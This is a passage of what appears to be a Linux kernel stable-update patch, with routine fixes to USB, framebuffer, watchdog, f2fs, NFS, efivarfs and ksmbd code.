++	xhci_mtk_rxfifo_depth_set(mtk);
++}
++
+ static int xhci_mtk_host_enable(struct xhci_hcd_mtk *mtk)
+ {
+ 	struct mu3c_ippc_regs __iomem *ippc = mtk->ippc_regs;
+@@ -453,8 +488,7 @@ static int xhci_mtk_setup(struct usb_hcd *hcd)
+ 		if (ret)
+ 			return ret;
+ 
+-		/* workaround only for mt8195 */
+-		xhci_mtk_set_frame_interval(mtk);
++		xhci_mtk_init_quirk(mtk);
+ 	}
+ 
+ 	ret = xhci_gen_setup(hcd, xhci_mtk_quirks);
+@@ -531,6 +565,8 @@ static int xhci_mtk_probe(struct platform_device *pdev)
+ 	of_property_read_u32(node, "mediatek,u2p-dis-msk",
+ 			     &mtk->u2p_dis_msk);
+ 
++	of_property_read_u32(node, "rx-fifo-depth", &mtk->rxfifo_depth);
++
+ 	ret = usb_wakeup_of_property_parse(mtk, node);
+ 	if (ret) {
+ 		dev_err(dev, "failed to parse uwk property\n");
+diff --git a/drivers/usb/host/xhci-mtk.h b/drivers/usb/host/xhci-mtk.h
+index 1174a510dd388..2a6a47d0f09a4 100644
+--- a/drivers/usb/host/xhci-mtk.h
++++ b/drivers/usb/host/xhci-mtk.h
+@@ -160,6 +160,8 @@ struct xhci_hcd_mtk {
+ 	struct regmap *uwk;
+ 	u32 uwk_reg_base;
+ 	u32 uwk_vers;
++	/* quirk */
++	u32 rxfifo_depth;
+ };
+ 
+ static inline struct xhci_hcd_mtk *hcd_to_mtk(struct usb_hcd *hcd)
+diff --git a/drivers/usb/mon/mon_bin.c b/drivers/usb/mon/mon_bin.c
+index 094e812e9e692..35483217b1f6c 100644
+--- a/drivers/usb/mon/mon_bin.c
++++ b/drivers/usb/mon/mon_bin.c
+@@ -1247,14 +1247,19 @@ static vm_fault_t mon_bin_vma_fault(struct vm_fault *vmf)
+ 	struct mon_reader_bin *rp = vmf->vma->vm_private_data;
+ 	unsigned long offset, chunk_idx;
+ 	struct page *pageptr;
++	unsigned long flags;
+ 
++	spin_lock_irqsave(&rp->b_lock, flags);
+ 	offset = vmf->pgoff << PAGE_SHIFT;
+-	if (offset >= rp->b_size)
++	if (offset >= rp->b_size) {
++		spin_unlock_irqrestore(&rp->b_lock, flags);
+ 		return VM_FAULT_SIGBUS;
++	}
+ 	chunk_idx = offset / CHUNK_SIZE;
+ 	pageptr = rp->b_vec[chunk_idx].pg;
+ 	get_page(pageptr);
+ 	vmf->page = pageptr;
++	spin_unlock_irqrestore(&rp->b_lock, flags);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/usb/phy/phy-mxs-usb.c b/drivers/usb/phy/phy-mxs-usb.c
+index 9299df53eb9df..160c9264339f0 100644
+--- a/drivers/usb/phy/phy-mxs-usb.c
++++ b/drivers/usb/phy/phy-mxs-usb.c
+@@ -388,8 +388,7 @@ static void __mxs_phy_disconnect_line(struct mxs_phy *mxs_phy, bool disconnect)
+ 
+ static bool mxs_phy_is_otg_host(struct mxs_phy *mxs_phy)
+ {
+-	return IS_ENABLED(CONFIG_USB_OTG) &&
+-		mxs_phy->phy.last_event == USB_EVENT_ID;
++	return mxs_phy->phy.last_event == USB_EVENT_ID;
+ }
+ 
+ static void mxs_phy_disconnect_line(struct mxs_phy *mxs_phy, bool on)
+diff --git a/drivers/usb/typec/class.c b/drivers/usb/typec/class.c
+index 49d6b2388b874..3da404d5178d3 100644
+--- a/drivers/usb/typec/class.c
++++ b/drivers/usb/typec/class.c
+@@ -263,11 +263,13 @@ static void typec_altmode_put_partner(struct altmode *altmode)
+ {
+ 	struct altmode *partner = altmode->partner;
+ 	struct typec_altmode *adev;
++	struct typec_altmode *partner_adev;
+ 
+ 	if (!partner)
+ 		return;
+ 
+ 	adev = &altmode->adev;
++	partner_adev = &partner->adev;
+ 
+ 	if (is_typec_plug(adev->dev.parent)) {
+ 		struct typec_plug *plug = to_typec_plug(adev->dev.parent);
+@@ -276,7 +278,7 @@ static void typec_altmode_put_partner(struct altmode *altmode)
+ 	} else {
+ 		partner->partner = NULL;
+ 	}
+-	put_device(&adev->dev);
++	put_device(&partner_adev->dev);
+ }
+ 
+ /**
+diff --git a/drivers/vdpa/alibaba/eni_vdpa.c b/drivers/vdpa/alibaba/eni_vdpa.c
+index 5a09a09cca709..cce3d1837104c 100644
+--- a/drivers/vdpa/alibaba/eni_vdpa.c
++++ b/drivers/vdpa/alibaba/eni_vdpa.c
+@@ -497,7 +497,7 @@ static int eni_vdpa_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	if (!eni_vdpa->vring) {
+ 		ret = -ENOMEM;
+ 		ENI_ERR(pdev, "failed to allocate virtqueues\n");
+-		goto err;
++		goto err_remove_vp_legacy;
+ 	}
+ 
+ 	for (i = 0; i < eni_vdpa->queues; i++) {
+@@ -509,11 +509,13 @@ static int eni_vdpa_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	ret = vdpa_register_device(&eni_vdpa->vdpa, eni_vdpa->queues);
+ 	if (ret) {
+ 		ENI_ERR(pdev, "failed to register to vdpa bus\n");
+-		goto err;
++		goto err_remove_vp_legacy;
+ 	}
+ 
+ 	return 0;
+ 
++err_remove_vp_legacy:
++	vp_legacy_remove(&eni_vdpa->ldev);
+ err:
+ 	put_device(&eni_vdpa->vdpa.dev);
+ 	return ret;
+diff --git a/drivers/video/fbdev/core/fb_defio.c b/drivers/video/fbdev/core/fb_defio.c
+index a3cf1f764f29b..49883c8012e60 100644
+--- a/drivers/video/fbdev/core/fb_defio.c
++++ b/drivers/video/fbdev/core/fb_defio.c
+@@ -132,11 +132,7 @@ int fb_deferred_io_fsync(struct file *file, loff_t start, loff_t end, int datasy
+ 		return 0;
+ 
+ 	inode_lock(inode);
+-	/* Kill off the delayed work */
+-	cancel_delayed_work_sync(&info->deferred_work);
+-
+-	/* Run it immediately */
+-	schedule_delayed_work(&info->deferred_work, 0);
++	flush_delayed_work(&info->deferred_work);
+ 	inode_unlock(inode);
+ 
+ 	return 0;
+@@ -321,7 +317,7 @@ static void fb_deferred_io_lastclose(struct fb_info *info)
+ 	struct page *page;
+ 	int i;
+ 
+-	cancel_delayed_work_sync(&info->deferred_work);
++	flush_delayed_work(&info->deferred_work);
+ 
+ 	/* clear out the mapping that we setup */
+ 	for (i = 0 ; i < info->fix.smem_len; i += PAGE_SIZE) {
+diff --git a/drivers/video/fbdev/imxfb.c b/drivers/video/fbdev/imxfb.c
+index 36ada87b49a49..32b8374abeca5 100644
+--- a/drivers/video/fbdev/imxfb.c
++++ b/drivers/video/fbdev/imxfb.c
+@@ -42,6 +42,7 @@
+ #include <video/videomode.h>
+ 
+ #define PCR_TFT		(1 << 31)
++#define PCR_COLOR	(1 << 30)
+ #define PCR_BPIX_8	(3 << 25)
+ #define PCR_BPIX_12	(4 << 25)
+ #define PCR_BPIX_16	(5 << 25)
+@@ -150,6 +151,12 @@ enum imxfb_type {
+ 	IMX21_FB,
+ };
+ 
++enum imxfb_panel_type {
++	PANEL_TYPE_MONOCHROME,
++	PANEL_TYPE_CSTN,
++	PANEL_TYPE_TFT,
++};
++
+ struct imxfb_info {
+ 	struct platform_device  *pdev;
+ 	void __iomem		*regs;
+@@ -157,6 +164,7 @@ struct imxfb_info {
+ 	struct clk		*clk_ahb;
+ 	struct clk		*clk_per;
+ 	enum imxfb_type		devtype;
++	enum imxfb_panel_type	panel_type;
+ 	bool			enabled;
+ 
+ 	/*
+@@ -444,6 +452,13 @@ static int imxfb_check_var(struct fb_var_screeninfo *var, struct fb_info *info)
+ 	if (!is_imx1_fb(fbi) && imxfb_mode->aus_mode)
+ 		fbi->lauscr = LAUSCR_AUS_MODE;
+ 
++	if (imxfb_mode->pcr & PCR_TFT)
++		fbi->panel_type = PANEL_TYPE_TFT;
++	else if (imxfb_mode->pcr & PCR_COLOR)
++		fbi->panel_type = PANEL_TYPE_CSTN;
++	else
++		fbi->panel_type = PANEL_TYPE_MONOCHROME;
++
+ 	/*
+ 	 * Copy the RGB parameters for this display
+ 	 * from the machine specific parameters.
+@@ -598,6 +613,7 @@ static int imxfb_activate_var(struct fb_var_screeninfo *var, struct fb_info *inf
+ {
+ 	struct imxfb_info *fbi = info->par;
+ 	u32 ymax_mask = is_imx1_fb(fbi) ? YMAX_MASK_IMX1 : YMAX_MASK_IMX21;
++	u8 left_margin_low;
+ 
+ 	pr_debug("var: xres=%d hslen=%d lm=%d rm=%d\n",
+ 		var->xres, var->hsync_len,
+@@ -606,6 +622,13 @@ static int imxfb_activate_var(struct fb_var_screeninfo *var, struct fb_info *inf
+ 		var->yres, var->vsync_len,
+ 		var->upper_margin, var->lower_margin);
+ 
++	if (fbi->panel_type == PANEL_TYPE_TFT)
++		left_margin_low = 3;
++	else if (fbi->panel_type == PANEL_TYPE_CSTN)
++		left_margin_low = 2;
++	else
++		left_margin_low = 0;
++
+ #if DEBUG_VAR
+ 	if (var->xres < 16        || var->xres > 1024)
+ 		printk(KERN_ERR "%s: invalid xres %d\n",
+@@ -613,7 +636,7 @@ static int imxfb_activate_var(struct fb_var_screeninfo *var, struct fb_info *inf
+ 	if (var->hsync_len < 1    || var->hsync_len > 64)
+ 		printk(KERN_ERR "%s: invalid hsync_len %d\n",
+ 			info->fix.id, var->hsync_len);
+-	if (var->left_margin < 3  || var->left_margin > 255)
++	if (var->left_margin < left_margin_low  || var->left_margin > 255)
+ 		printk(KERN_ERR "%s: invalid left_margin %d\n",
+ 			info->fix.id, var->left_margin);
+ 	if (var->right_margin < 1 || var->right_margin > 255)
+@@ -639,7 +662,7 @@ static int imxfb_activate_var(struct fb_var_screeninfo *var, struct fb_info *inf
+ 
+ 	writel(HCR_H_WIDTH(var->hsync_len - 1) |
+ 		HCR_H_WAIT_1(var->right_margin - 1) |
+-		HCR_H_WAIT_2(var->left_margin - 3),
++		HCR_H_WAIT_2(var->left_margin - left_margin_low),
+ 		fbi->regs + LCDC_HCR);
+ 
+ 	writel(VCR_V_WIDTH(var->vsync_len) |
+diff --git a/drivers/watchdog/bcm2835_wdt.c b/drivers/watchdog/bcm2835_wdt.c
+index 94907176a0e4f..55c0f7b0e8fba 100644
+--- a/drivers/watchdog/bcm2835_wdt.c
++++ b/drivers/watchdog/bcm2835_wdt.c
+@@ -42,6 +42,7 @@
+ 
+ #define SECS_TO_WDOG_TICKS(x) ((x) << 16)
+ #define WDOG_TICKS_TO_SECS(x) ((x) >> 16)
++#define WDOG_TICKS_TO_MSECS(x) ((x) * 1000 >> 16)
+ 
+ struct bcm2835_wdt {
+ 	void __iomem		*base;
+@@ -140,7 +141,7 @@ static struct watchdog_device bcm2835_wdt_wdd = {
+ 	.info =		&bcm2835_wdt_info,
+ 	.ops =		&bcm2835_wdt_ops,
+ 	.min_timeout =	1,
+-	.max_timeout =	WDOG_TICKS_TO_SECS(PM_WDOG_TIME_SET),
++	.max_hw_heartbeat_ms =	WDOG_TICKS_TO_MSECS(PM_WDOG_TIME_SET),
+ 	.timeout =	WDOG_TICKS_TO_SECS(PM_WDOG_TIME_SET),
+ };
+ 
+diff --git a/drivers/watchdog/hpwdt.c b/drivers/watchdog/hpwdt.c
+index f79f932bca148..79ed1626d8ea1 100644
+--- a/drivers/watchdog/hpwdt.c
++++ b/drivers/watchdog/hpwdt.c
+@@ -178,7 +178,7 @@ static int hpwdt_pretimeout(unsigned int ulReason, struct pt_regs *regs)
+ 		"3. OA Forward Progress Log\n"
+ 		"4. iLO Event Log";
+ 
+-	if (ilo5 && ulReason == NMI_UNKNOWN && !mynmi)
++	if (ulReason == NMI_UNKNOWN && !mynmi)
+ 		return NMI_DONE;
+ 
+ 	if (ilo5 && !pretimeout && !mynmi)
+diff --git a/drivers/watchdog/rti_wdt.c b/drivers/watchdog/rti_wdt.c
+index 6e9253761fc10..ea617c0f97470 100644
+--- a/drivers/watchdog/rti_wdt.c
++++ b/drivers/watchdog/rti_wdt.c
+@@ -70,6 +70,11 @@ static int rti_wdt_start(struct watchdog_device *wdd)
+ {
+ 	u32 timer_margin;
+ 	struct rti_wdt_device *wdt = watchdog_get_drvdata(wdd);
++	int ret;
++
++	ret = pm_runtime_resume_and_get(wdd->parent);
++	if (ret)
++		return ret;
+ 
+ 	/* set timeout period */
+ 	timer_margin = (u64)wdd->timeout * wdt->freq;
+@@ -295,6 +300,9 @@ static int rti_wdt_probe(struct platform_device *pdev)
+ 	if (last_ping)
+ 		watchdog_set_last_hw_keepalive(wdd, last_ping);
+ 
++	if (!watchdog_hw_running(wdd))
++		pm_runtime_put_sync(&pdev->dev);
++
+ 	return 0;
+ 
+ err_iomap:
+@@ -309,7 +317,10 @@ static int rti_wdt_remove(struct platform_device *pdev)
+ 	struct rti_wdt_device *wdt = platform_get_drvdata(pdev);
+ 
+ 	watchdog_unregister_device(&wdt->wdd);
+-	pm_runtime_put(&pdev->dev);
++
++	if (!pm_runtime_suspended(&pdev->dev))
++		pm_runtime_put(&pdev->dev);
++
+ 	pm_runtime_disable(&pdev->dev);
+ 
+ 	return 0;
+diff --git a/drivers/watchdog/watchdog_dev.c b/drivers/watchdog/watchdog_dev.c
+index fdffa6859dde3..81684d89dc98f 100644
+--- a/drivers/watchdog/watchdog_dev.c
++++ b/drivers/watchdog/watchdog_dev.c
+@@ -1052,6 +1052,7 @@ static int watchdog_cdev_register(struct watchdog_device *wdd)
+ 
+ 	/* Fill in the data structures */
+ 	cdev_init(&wd_data->cdev, &watchdog_fops);
++	wd_data->cdev.owner = wdd->ops->owner;
+ 
+ 	/* Add the device */
+ 	err = cdev_device_add(&wd_data->cdev, &wd_data->dev);
+@@ -1066,8 +1067,6 @@ static int watchdog_cdev_register(struct watchdog_device *wdd)
+ 		return err;
+ 	}
+ 
+-	wd_data->cdev.owner = wdd->ops->owner;
+-
+ 	/* Record time of most recent heartbeat as 'just before now'. */
+ 	wd_data->last_hw_keepalive = ktime_sub(ktime_get(), 1);
+ 	watchdog_set_open_deadline(wd_data);
+diff --git a/fs/efivarfs/super.c b/fs/efivarfs/super.c
+index 6780fc81cc11f..77c7615bba5e1 100644
+--- a/fs/efivarfs/super.c
++++ b/fs/efivarfs/super.c
+@@ -13,6 +13,7 @@
+ #include <linux/ucs2_string.h>
+ #include <linux/slab.h>
+ #include <linux/magic.h>
++#include <linux/printk.h>
+ 
+ #include "internal.h"
+ 
+@@ -226,8 +227,19 @@ static int efivarfs_get_tree(struct fs_context *fc)
+ 	return get_tree_single(fc, efivarfs_fill_super);
+ }
+ 
++static int efivarfs_reconfigure(struct fs_context *fc)
++{
++	if (!efivar_supports_writes() && !(fc->sb_flags & SB_RDONLY)) {
++		pr_err("Firmware does not support SetVariableRT. Can not remount with rw\n");
++		return -EINVAL;
++	}
++
++	return 0;
++}
++
+ static const struct fs_context_operations efivarfs_context_ops = {
+ 	.get_tree	= efivarfs_get_tree,
++	.reconfigure	= efivarfs_reconfigure,
+ };
+ 
+ static int efivarfs_init_fs_context(struct fs_context *fc)
+@@ -238,10 +250,13 @@ static int efivarfs_init_fs_context(struct fs_context *fc)
+ 
+ static void efivarfs_kill_sb(struct super_block *sb)
+ {
++	struct efivarfs_fs_info *sfi = sb->s_fs_info;
++
+ 	kill_litter_super(sb);
+ 
+ 	/* Remove all entries and destroy */
+ 	efivar_entry_iter(efivarfs_destroy, &efivarfs_list, NULL);
++	kfree(sfi);
+ }
+ 
+ static struct file_system_type efivarfs_type = {
+diff --git a/fs/erofs/zdata.c b/fs/erofs/zdata.c
+index 1b91ac5be9610..cf9a2fa7f55d2 100644
+--- a/fs/erofs/zdata.c
++++ b/fs/erofs/zdata.c
+@@ -1192,12 +1192,11 @@ out:
+ 		put_page(page);
+ 	} else {
+ 		for (i = 0; i < pclusterpages; ++i) {
+-			page = pcl->compressed_bvecs[i].page;
++			/* consider shortlived pages added when decompressing */
++			page = be->compressed_pages[i];
+ 
+ 			if (erofs_page_is_managed(sbi, page))
+ 				continue;
+-
+-			/* recycle all individual short-lived pages */
+ 			(void)z_erofs_put_shortlivedpage(be->pagepool, page);
+ 			WRITE_ONCE(pcl->compressed_bvecs[i].page, NULL);
+ 		}
+diff --git a/fs/f2fs/data.c b/fs/f2fs/data.c
+index 3666c1fd77a64..8b561af379743 100644
+--- a/fs/f2fs/data.c
++++ b/fs/f2fs/data.c
+@@ -2490,9 +2490,6 @@ int f2fs_encrypt_one_page(struct f2fs_io_info *fio)
+ 
+ 	page = fio->compressed_page ? fio->compressed_page : fio->page;
+ 
+-	/* wait for GCed page writeback via META_MAPPING */
+-	f2fs_wait_on_block_writeback(inode, fio->old_blkaddr);
+-
+ 	if (fscrypt_inode_uses_inline_crypto(inode))
+ 		return 0;
+ 
+@@ -2681,6 +2678,10 @@ got_it:
+ 		goto out_writepage;
+ 	}
+ 
++	/* wait for GCed page writeback via META_MAPPING */
++	if (fio->post_read)
++		f2fs_wait_on_block_writeback(inode, fio->old_blkaddr);
++
+ 	/*
+ 	 * If current allocation needs SSR,
+ 	 * it had better in-place writes for updated data.
+diff --git a/fs/f2fs/file.c b/fs/f2fs/file.c
+index 9b9fb3c57ec6c..fd22854dbeaea 100644
+--- a/fs/f2fs/file.c
++++ b/fs/f2fs/file.c
+@@ -42,7 +42,7 @@ static vm_fault_t f2fs_filemap_fault(struct vm_fault *vmf)
+ 	vm_fault_t ret;
+ 
+ 	ret = filemap_fault(vmf);
+-	if (!ret)
++	if (ret & VM_FAULT_LOCKED)
+ 		f2fs_update_iostat(F2FS_I_SB(inode), inode,
+ 					APP_MAPPED_READ_IO, F2FS_BLKSIZE);
+ 
+@@ -2821,6 +2821,11 @@ static int f2fs_move_file_range(struct file *file_in, loff_t pos_in,
+ 			goto out;
+ 	}
+ 
++	if (f2fs_compressed_file(src) || f2fs_compressed_file(dst)) {
++		ret = -EOPNOTSUPP;
++		goto out_unlock;
++	}
++
+ 	ret = -EINVAL;
+ 	if (pos_in + len > src->i_size || pos_in + len < pos_in)
+ 		goto out_unlock;
+diff --git a/fs/f2fs/namei.c b/fs/f2fs/namei.c
+index bd020a992c2e7..328cd20b16a54 100644
+--- a/fs/f2fs/namei.c
++++ b/fs/f2fs/namei.c
+@@ -1099,7 +1099,7 @@ static int f2fs_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 	}
+ 
+ 	if (old_dir_entry) {
+-		if (old_dir != new_dir && !whiteout)
++		if (old_dir != new_dir)
+ 			f2fs_set_link(old_inode, old_dir_entry,
+ 						old_dir_page, new_dir);
+ 		else
+diff --git a/fs/f2fs/node.c b/fs/f2fs/node.c
+index 6efccd7ccfe1b..c6d0e07096326 100644
+--- a/fs/f2fs/node.c
++++ b/fs/f2fs/node.c
+@@ -2738,11 +2738,11 @@ recover_xnid:
+ 	f2fs_update_inode_page(inode);
+ 
+ 	/* 3: update and set xattr node page dirty */
+-	if (page)
++	if (page) {
+ 		memcpy(F2FS_NODE(xpage), F2FS_NODE(page),
+ 				VALID_XATTR_BLOCK_SIZE);
+-
+-	set_page_dirty(xpage);
++		set_page_dirty(xpage);
++	}
+ 	f2fs_put_page(xpage, 1);
+ 
+ 	return 0;
+diff --git a/fs/f2fs/xattr.c b/fs/f2fs/xattr.c
+index 8816e13ca7c9e..0631b383e21f4 100644
+--- a/fs/f2fs/xattr.c
++++ b/fs/f2fs/xattr.c
+@@ -660,11 +660,14 @@ retry:
+ 	here = __find_xattr(base_addr, last_base_addr, NULL, index, len, name);
+ 	if (!here) {
+ 		if (!F2FS_I(inode)->i_xattr_nid) {
++			error = f2fs_recover_xattr_data(inode, NULL);
+ 			f2fs_notice(F2FS_I_SB(inode),
+-				"recover xattr in inode (%lu)", inode->i_ino);
+-			f2fs_recover_xattr_data(inode, NULL);
+-			kfree(base_addr);
+-			goto retry;
++				"recover xattr in inode (%lu), error(%d)",
++					inode->i_ino, error);
++			if (!error) {
++				kfree(base_addr);
++				goto retry;
++			}
+ 		}
+ 		f2fs_err(F2FS_I_SB(inode), "set inode (%lu) has corrupted xattr",
+ 								inode->i_ino);
+diff --git a/fs/gfs2/rgrp.c b/fs/gfs2/rgrp.c
+index f602fb8449519..dcaaa32efc4a0 100644
+--- a/fs/gfs2/rgrp.c
++++ b/fs/gfs2/rgrp.c
+@@ -2306,7 +2306,7 @@ void gfs2_rgrp_dump(struct seq_file *seq, struct gfs2_rgrpd *rgd,
+ 		       (unsigned long long)rgd->rd_addr, rgd->rd_flags,
+ 		       rgd->rd_free, rgd->rd_free_clone, rgd->rd_dinodes,
+ 		       rgd->rd_requested, rgd->rd_reserved, rgd->rd_extfail_pt);
+-	if (rgd->rd_sbd->sd_args.ar_rgrplvb) {
++	if (rgd->rd_sbd->sd_args.ar_rgrplvb && rgd->rd_rgl) {
+ 		struct gfs2_rgrp_lvb *rgl = rgd->rd_rgl;
+ 
+ 		gfs2_print_dbg(seq, "%s  L: f:%02x b:%u i:%u\n", fs_id_buf,
+diff --git a/fs/namespace.c b/fs/namespace.c
+index e04a9e9e3f14f..29a8d90dd1072 100644
+--- a/fs/namespace.c
++++ b/fs/namespace.c
+@@ -2693,7 +2693,12 @@ static int do_remount(struct path *path, int ms_flags, int sb_flags,
+ 	if (IS_ERR(fc))
+ 		return PTR_ERR(fc);
+ 
++	/*
++	 * Indicate to the filesystem that the remount request is coming
++	 * from the legacy mount system call.
++	 */
+ 	fc->oldapi = true;
++
+ 	err = parse_monolithic_mount_data(fc, data);
+ 	if (!err) {
+ 		down_write(&sb->s_umount);
+@@ -3027,6 +3032,12 @@ static int do_new_mount(struct path *path, const char *fstype, int sb_flags,
+ 	if (IS_ERR(fc))
+ 		return PTR_ERR(fc);
+ 
++	/*
++	 * Indicate to the filesystem that the mount request is coming
++	 * from the legacy mount system call.
++	 */
++	fc->oldapi = true;
++
+ 	if (subtype)
+ 		err = vfs_parse_fs_string(fc, "subtype",
+ 					  subtype, strlen(subtype));
+diff --git a/fs/nfs/blocklayout/blocklayout.c b/fs/nfs/blocklayout/blocklayout.c
+index 943aeea1eb160..6be13e0ec170d 100644
+--- a/fs/nfs/blocklayout/blocklayout.c
++++ b/fs/nfs/blocklayout/blocklayout.c
+@@ -580,6 +580,8 @@ retry:
+ 		nfs4_delete_deviceid(node->ld, node->nfs_client, id);
+ 		goto retry;
+ 	}
++
++	nfs4_put_deviceid_node(node);
+ 	return ERR_PTR(-ENODEV);
+ }
+ 
+@@ -893,10 +895,9 @@ bl_pg_init_write(struct nfs_pageio_descriptor *pgio, struct nfs_page *req)
+ 	}
+ 
+ 	if (pgio->pg_dreq == NULL)
+-		wb_size = pnfs_num_cont_bytes(pgio->pg_inode,
+-					      req->wb_index);
++		wb_size = pnfs_num_cont_bytes(pgio->pg_inode, req->wb_index);
+ 	else
+-		wb_size = nfs_dreq_bytes_left(pgio->pg_dreq);
++		wb_size = nfs_dreq_bytes_left(pgio->pg_dreq, req_offset(req));
+ 
+ 	pnfs_generic_pg_init_write(pgio, req, wb_size);
+ 
+diff --git a/fs/nfs/direct.c b/fs/nfs/direct.c
+index 3bb530d4bb5ce..8fdb65e1b14a3 100644
+--- a/fs/nfs/direct.c
++++ b/fs/nfs/direct.c
+@@ -195,9 +195,10 @@ static void nfs_direct_req_release(struct nfs_direct_req *dreq)
+ 	kref_put(&dreq->kref, nfs_direct_req_free);
+ }
+ 
+-ssize_t nfs_dreq_bytes_left(struct nfs_direct_req *dreq)
++ssize_t nfs_dreq_bytes_left(struct nfs_direct_req *dreq, loff_t offset)
+ {
+-	return dreq->bytes_left;
++	loff_t start = offset - dreq->io_start;
++	return dreq->max_count - start;
+ }
+ EXPORT_SYMBOL_GPL(nfs_dreq_bytes_left);
+ 
+diff --git a/fs/nfs/internal.h b/fs/nfs/internal.h
+index 4b07a0508f9d8..35a8ae46b6c34 100644
+--- a/fs/nfs/internal.h
++++ b/fs/nfs/internal.h
+@@ -640,7 +640,7 @@ extern int nfs_sillyrename(struct inode *dir, struct dentry *dentry);
+ /* direct.c */
+ void nfs_init_cinfo_from_dreq(struct nfs_commit_info *cinfo,
+ 			      struct nfs_direct_req *dreq);
+-extern ssize_t nfs_dreq_bytes_left(struct nfs_direct_req *dreq);
++extern ssize_t nfs_dreq_bytes_left(struct nfs_direct_req *dreq, loff_t offset);
+ 
+ /* nfs4proc.c */
+ extern struct nfs_client *nfs4_init_client(struct nfs_client *clp,
+diff --git a/fs/nfs/nfs4proc.c b/fs/nfs/nfs4proc.c
+index 85a952143e9fb..ec3f0103e1a7f 100644
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -170,6 +170,7 @@ static int nfs4_map_errors(int err)
+ 	case -NFS4ERR_RESOURCE:
+ 	case -NFS4ERR_LAYOUTTRYLATER:
+ 	case -NFS4ERR_RECALLCONFLICT:
++	case -NFS4ERR_RETURNCONFLICT:
+ 		return -EREMOTEIO;
+ 	case -NFS4ERR_WRONGSEC:
+ 	case -NFS4ERR_WRONG_CRED:
+@@ -558,6 +559,7 @@ static int nfs4_do_handle_exception(struct nfs_server *server,
+ 		case -NFS4ERR_GRACE:
+ 		case -NFS4ERR_LAYOUTTRYLATER:
+ 		case -NFS4ERR_RECALLCONFLICT:
++		case -NFS4ERR_RETURNCONFLICT:
+ 			exception->delay = 1;
+ 			return 0;
+ 
+@@ -9667,6 +9669,7 @@ nfs4_layoutget_handle_exception(struct rpc_task *task,
+ 		status = -EBUSY;
+ 		break;
+ 	case -NFS4ERR_RECALLCONFLICT:
++	case -NFS4ERR_RETURNCONFLICT:
+ 		status = -ERECALLCONFLICT;
+ 		break;
+ 	case -NFS4ERR_DELEG_REVOKED:
+diff --git a/fs/nfs/pnfs.c b/fs/nfs/pnfs.c
+index 1ffb1068216b6..4448ff829cbb9 100644
+--- a/fs/nfs/pnfs.c
++++ b/fs/nfs/pnfs.c
+@@ -2729,7 +2729,8 @@ pnfs_generic_pg_init_read(struct nfs_pageio_descriptor *pgio, struct nfs_page *r
+ 		if (pgio->pg_dreq == NULL)
+ 			rd_size = i_size_read(pgio->pg_inode) - req_offset(req);
+ 		else
+-			rd_size = nfs_dreq_bytes_left(pgio->pg_dreq);
++			rd_size = nfs_dreq_bytes_left(pgio->pg_dreq,
++						      req_offset(req));
+ 
+ 		pgio->pg_lseg =
+ 			pnfs_update_layout(pgio->pg_inode, nfs_req_openctx(req),
+diff --git a/fs/pstore/ram_core.c b/fs/pstore/ram_core.c
+index 1e755d093d921..f479e0755a247 100644
+--- a/fs/pstore/ram_core.c
++++ b/fs/pstore/ram_core.c
+@@ -190,7 +190,7 @@ static int persistent_ram_init_ecc(struct persistent_ram_zone *prz,
+ {
+ 	int numerr;
+ 	struct persistent_ram_buffer *buffer = prz->buffer;
+-	int ecc_blocks;
++	size_t ecc_blocks;
+ 	size_t ecc_total;
+ 
+ 	if (!ecc_info || !ecc_info->ecc_size)
+diff --git a/fs/smb/server/asn1.c b/fs/smb/server/asn1.c
+index 4a4b2b03ff33d..b931a99ab9c85 100644
+--- a/fs/smb/server/asn1.c
++++ b/fs/smb/server/asn1.c
+@@ -214,10 +214,15 @@ static int ksmbd_neg_token_alloc(void *context, size_t hdrlen,
+ {
+ 	struct ksmbd_conn *conn = context;
+ 
++	if (!vlen)
++		return -EINVAL;
++
+ 	conn->mechToken = kmemdup_nul(value, vlen, GFP_KERNEL);
+ 	if (!conn->mechToken)
+ 		return -ENOMEM;
+ 
++	conn->mechTokenLen = (unsigned int)vlen;
++
+ 	return 0;
+ }
+ 
+diff --git a/fs/smb/server/connection.c b/fs/smb/server/connection.c
+index b6fa1e285c401..7977827c65410 100644
+--- a/fs/smb/server/connection.c
++++ b/fs/smb/server/connection.c
+@@ -415,13 +415,7 @@ static void stop_sessions(void)
+ again:
+ 	down_read(&conn_list_lock);
+ 	list_for_each_entry(conn, &conn_list, conns_list) {
+-		struct task_struct *task;
+-
+ 		t = conn->transport;
+-		task = t->handler;
+-		if (task)
+-			ksmbd_debug(CONN, "Stop session handler %s/%d\n",
+-				    task->comm, task_pid_nr(task));
+ 		ksmbd_conn_set_exiting(conn);
+ 		if (t->ops->shutdown) {
+ 			up_read(&conn_list_lock);
+diff --git a/fs/smb/server/connection.h b/fs/smb/server/connection.h
+index 3c005246a32e8..0e04cf8b1d896 100644
+--- a/fs/smb/server/connection.h
++++ b/fs/smb/server/connection.h
+@@ -88,6 +88,7 @@ struct ksmbd_conn {
+ 	__u16				dialect;
+ 
+ 	char				*mechToken;
++	unsigned int			mechTokenLen;
+ 
+ 	struct ksmbd_conn_ops	*conn_ops;
+ 
+@@ -134,7 +135,6 @@ struct ksmbd_transport_ops {
+ struct ksmbd_transport {
+ 	struct ksmbd_conn		*conn;
+ 	struct ksmbd_transport_ops	*ops;
+-	struct task_struct		*handler;
+ };
+ 
+ #define KSMBD_TCP_RECV_TIMEOUT	(7 * HZ)
+diff --git a/fs/smb/server/oplock.c b/fs/smb/server/oplock.c
+index af0f6914eca45..f1831e26adad9 100644
+--- a/fs/smb/server/oplock.c
++++ b/fs/smb/server/oplock.c
+@@ -1191,6 +1191,12 @@ int smb_grant_oplock(struct ksmbd_work *work, int req_op_level, u64 pid,
+ 	bool prev_op_has_lease;
+ 	__le32 prev_op_state = 0;
+ 
++	/* Only v2 leases handle the directory */
++	if (S_ISDIR(file_inode(fp->filp)->i_mode)) {
++		if (!lctx || lctx->version != 2)
++			return 0;
++	}
++
+ 	opinfo = alloc_opinfo(work, pid, tid);
+ 	if (!opinfo)
+ 		return -ENOMEM;
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index 46070951d163a..6826b562073e0 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -1412,7 +1412,10 @@ static struct ksmbd_user *session_user(struct ksmbd_conn *conn,
+ 	char *name;
